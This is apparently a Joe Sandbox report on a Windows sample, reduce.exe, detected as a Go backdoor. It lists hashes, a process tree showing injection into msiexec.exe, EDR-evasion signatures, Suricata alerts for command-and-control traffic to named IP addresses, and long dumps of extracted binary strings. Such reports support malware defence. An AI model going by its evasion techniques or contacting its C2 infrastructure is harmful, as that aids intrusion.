Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
reduce.exe

Overview

General Information

Sample name:reduce.exe
Analysis ID:1568776
MD5:b0f4c61f99716127097da80d07ed6123
SHA1:310e490a366e2d55b27417f545e4abd575fad0a3
SHA256:fdb10dd37d214b1e9e4258e601a6b3d7a3d9615513b3e0afaad8d9cc09481087
Tags:exeuser-smica83
Infos:

Detection

GO Backdoor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Found Tor onion address
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection

Classification

  • System is w10x64
  • reduce.exe (PID: 7528 cmdline: "C:\Users\user\Desktop\reduce.exe" MD5: B0F4C61F99716127097DA80D07ED6123)
    • more.com (PID: 7592 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 8024 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • Client32.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\jion\Client32.exe" MD5: B0F4C61F99716127097DA80D07ED6123)
    • more.com (PID: 8060 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7204 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: msiexec.exe PID: 8024JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.8.232.106, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 8024, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49741
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T23:24:07.286896+010028555361A Network Trojan was detected192.168.2.449763185.121.233.15228250TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T23:24:36.083072+010028555371A Network Trojan was detected192.168.2.449763185.121.233.15228250TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T23:24:36.469876+010028555381A Network Trojan was detected185.121.233.15228250192.168.2.449763TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-04T23:24:07.286691+010028555391A Network Trojan was detected185.121.233.15228250192.168.2.449763TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Users\user\AppData\Local\Temp\kupcqAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
    Source: C:\Users\user\AppData\Local\Temp\nfaboAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
    Source: C:\Users\user\AppData\Local\Temp\kupcqReversingLabs: Detection: 47%
    Source: C:\Users\user\AppData\Local\Temp\nfaboReversingLabs: Detection: 47%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: Binary string: ntdll.pdb source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdbUGP source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: ntdll.pdbUGP source: reduce.exe, 00000000.00000002.1717960380.0000000008094000.00000004.00000001.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717772547.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, reduce.exe, 00000000.00000002.1717514430.0000000007894000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990504856.0000000007863000.00000004.00000020.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990846904.000000000816B000.00000004.00000001.00020000.00000000.sdmp, Client32.exe, 00000008.00000002.1990644776.0000000007C60000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: more.com, 00000001.00000002.2006505480.00000000044F3000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2007201023.0000000005040000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2954644321.0000000005F60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2953692888.000000000541E000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214422504.0000000004782000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000009.00000002.2214963020.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2216464873.0000000004851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2217032269.00000000053B0000.00000004.00001000.00020000.00000000.sdmp

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.121.233.152:28250 -> 192.168.2.4:49763
    Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.4:49763 -> 185.121.233.152:28250
    Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.4:49763 -> 185.121.233.152:28250
    Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.121.233.152:28250 -> 192.168.2.4:49763
    Source: more.com, 00000001.00000002.2007610925.0000000006010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: msiexec.exe, 00000007.00000002.2952726390.00000000034E4000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: more.com, 00000009.00000002.2215145812.0000000005C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: msiexec.exe, 0000000B.00000002.2216154119.0000000002E34000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: kupcq.1.drString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: nfabo.9.drString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: global trafficTCP traffic: 192.168.2.4:49763 -> 185.121.233.152:28250
    Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
    Source: Joe Sandbox ViewIP Address: 188.130.206.243 188.130.206.243
    Source: Joe Sandbox ViewASN Name: IPCORE-ASES IPCORE-ASES
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
